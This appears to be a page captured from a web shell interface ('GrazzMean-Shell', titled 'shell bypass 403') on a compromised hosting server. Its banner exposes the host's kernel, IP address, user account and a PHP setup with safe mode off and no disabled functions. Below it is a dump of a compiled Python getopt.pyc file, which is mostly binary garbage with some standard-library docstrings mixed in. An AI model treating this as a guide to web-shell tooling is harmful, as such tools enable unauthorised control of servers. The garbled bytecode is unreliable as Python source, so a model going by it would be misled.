shell bypass 403

GrazzMean-Shell Shell

Uname: Linux business55.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
Software: LiteSpeed
PHP version: 8.1.31 [ PHP INFO ] PHP os: Linux
Server Ip: 162.213.251.212
Your Ip: 3.134.108.150
User: allssztx (535) | Group: allssztx (533)
Safe Mode: OFF
Disable Function:
NONE

name : getopt.cpython-313.pyc
�

1}g@����Sr/SQrSSKrSSKJr "SS\5r\r/4Sjr	/4S	jr
S
rSrSr
S
r\S:Xa$SSKr\"\	"\R$SSSSS/55 gg!\a SrN[f=f)a�Parser for command line options.

This module helps scripts to parse the command line arguments in
sys.argv.  It supports the same conventions as the Unix getopt()
function (including the special meanings of arguments of the form `-'
and `--').  Long options similar to those supported by GNU software
may be used as well via an optional third argument.  This module
provides two functions and an exception:

getopt() -- Parse command line options
gnu_getopt() -- Like getopt(), but allow option and non-option arguments
to be intermixed.
GetoptError -- exception (class) raised with 'opt' attribute, which is the
option involved with the exception.
)�GetoptError�error�getopt�
gnu_getopt�N)�gettextc��U$�N�)�ss �-/opt/alt/python313/lib64/python3.13/getopt.py�_r
)s��Q�h�c�,�\rSrSrSrSrSSjrSrSrg)r�+�c�H�XlX l[RXU5 gr	)�msg�opt�	Exception�__init__)�selfrrs   rr�GetoptError.__init__.s���������4�c�*rc��UR$r	)r)rs r�__str__�GetoptError.__str__3s���x�x�r)rrN)r)	�__name__�
__module__�__qualname__�__firstlineno__rrrr�__static_attributes__r
rrrr+s��
�C�
�C�+�
rrc��/n[U[5(aU/nO[U5nU(a�USRS5(a�USS:wa�USS:Xa	USSnX04$USRS5(a[	X0SSSX SS5up0O[X0SSSXSS5up0U(a$USRS5(aUSS:waM�X04$)a�getopt(args, options[, long_options]) -> opts, args

Parses command line options and parameter list.  args is the
argument list to be parsed, without the leading reference to the
running program.  Typically, this means "sys.argv[1:]".  shortopts
is the string of option letters that the script wants to
recognize, with options that require an argument followed by a
colon (i.e., the same format that Unix getopt() uses).  If
specified, longopts is a list of strings with the names of the
long options which should be supported.  The leading '--'
characters should not be included in the option name.  Options
which require an argument should be followed by an equal sign
('=').

The return value consists of two elements: the first is a list of
(option, value) pairs; the second is the list of program arguments
left after the option list was stripped (this is a trailing slice
of the first argument).  Each option-and-value pair returned has
the option as its first element, prefixed with a hyphen (e.g.,
'-x'), and the option argument as its second element, or an empty
string if the option has no argument.  The options occur in the
list in the same order in which they were found, thus allowing
multiple occurrences.  Long and short options may be mixed.

r�-�--�N�)�
isinstance�str�list�
startswith�do_longs�	do_shorts)�args�	shortopts�longopts�optss    rrr8s���6�D��(�C� � ��:����>��
�4��7�%�%�c�*�*�t�A�w�#�~���7�d�?����8�D���:����7���d�#�#�!�$�Q�����X�A�B�x�H�J�D�$�"�4�a�����i�a�b��J�J�D��4��7�%�%�c�*�*�t�A�w�#�~��:�rc� �/n/n[U[5(aU/nO[U5nURS5(aUSSnSnO)[R
R
S5(aSnOSnU(a�USS:XaX@SS-
nX44$USSS	S:Xa[X0SS	SX SS5up0OUUSSSS
:Xa!USS
:wa[X0SSSXSS5up0O(U(aX@-
nX44$URUS5 USSnU(aM�X44$)a�getopt(args, options[, long_options]) -> opts, args

This function works like getopt(), except that GNU style scanning
mode is used by default. This means that option and non-option
arguments may be intermixed. The getopt() function stops
processing options as soon as a non-option argument is
encountered.

If the first character of the option string is `+', or if the
environment variable POSIXLY_CORRECT is set, then option
processing stops as soon as a non-option argument is encountered.

�+r$NT�POSIXLY_CORRECTFrr#r%r")
r&r'r(r)�os�environ�getr*r+�append)r,r-r.r/�	prog_args�all_options_firsts      rrrcsP���D��I��(�C� � ��:����>�����C� � ��a�b�M�	� ��	�����)�	*�	*� ��!��
���7�d�?��a�b��!�I���?����7�2�A�;�$��!�$�Q�����X�A�B�x�H�J�D�$�
�!�W�R�a�[�C�
�D��G�s�N�"�4�a�����i�a�b��J�J�D�$� ��!�	��
�?��� � ��a��)��A�B�x���$�"�?�rc�Z�URS5nUSUXS-SpQ[X5upaU(a,Uc(U(d[[	S5U-U5eUSUSSp5OUb[[	S5U-U5eURSU-U=(d S45 X4$![a SnN�f=f)N�=r$zoption --%s requires argumentrz%option --%s must not have an argumentr#r)�index�
ValueError�
long_has_argsrr
r6)r/rr.r,�i�optarg�has_args       rr*r*�s���)��I�I�c�N���"�1�g�s�Q�3�4�y�V� ��/�L�G���>��!�!�$C�"D�s�"J�C�P�P���7�D���H�D��	�	��!�C�D�s�J�C�P�P��K�K����V�\�r�*�+��:��������s�B�B*�)B*c��UVs/sHo"RU5(dMUPM nnU(d[[S5U-U5eX;aSU4$US-U;aSU4$[U5S:�a[[S5U-U5e[U5S:XdeUSnUR	S5nU(aUSSnXT4$s snf)	Nzoption --%s not recognizedFr:Tr$zoption --%s not a unique prefixr���)r)rr
�len�endswith)rr.�o�
possibilities�unique_matchr@s      rr=r=�s��� (�>��1�L�L��,=�Q��M�>���!�8�9�C�?��E�E�
���c�z��	�s��m�	#��S�y��
�=��A���!�=�>��D�c�J�J��}���"�"�"� ��#�L��#�#�C�(�G��#�C�R�(��� � ��%?s
�B<�B<c���US:wakUSUSSp[XB5(a2US:Xa(U(d[[S5U-U5eUSUSSp1USpOSnURSU-U45 US:waMkX4$)Nrrr$zoption -%s requires argumentr")�
short_has_argrr
r6)r/�	optstringr-r,rr?s      rr+r+�s���
�r�/�"�1��y���}�Y���(�(��B���%�a�(F�&G�#�&M�&)�+�+�"&�q�'�4���8�4� )�2�I��F����S�3�Y��'�(��r�/��:�rc��[[U55H-nXUs=:XaS:wdMO MURSUS-5s $ [[	S5U-U5e)N�:r$zoption -%s not recognized)�rangerCr)rr
)rr-r>s   rrIrI�sX��
�3�y�>�
"���A�,�%�#�%�%��'�'��Q�q�S�1�1�#��a�3�4�s�:�C�
@�@r�__main__r$za:bzalpha=�beta)�__doc__�__all__r3rr
�ImportErrorrrrrrr*r=r+rIr�sys�print�argvr
rr�<module>rVs����B8��	��$�
	�)�	�	��')�)�V,.�0�d�,!�*
�A��z���	�&����!�"��u�x��&8�
9�:���]����s�A"�"	A.�-A.
© 2025 GrazzMean-Shell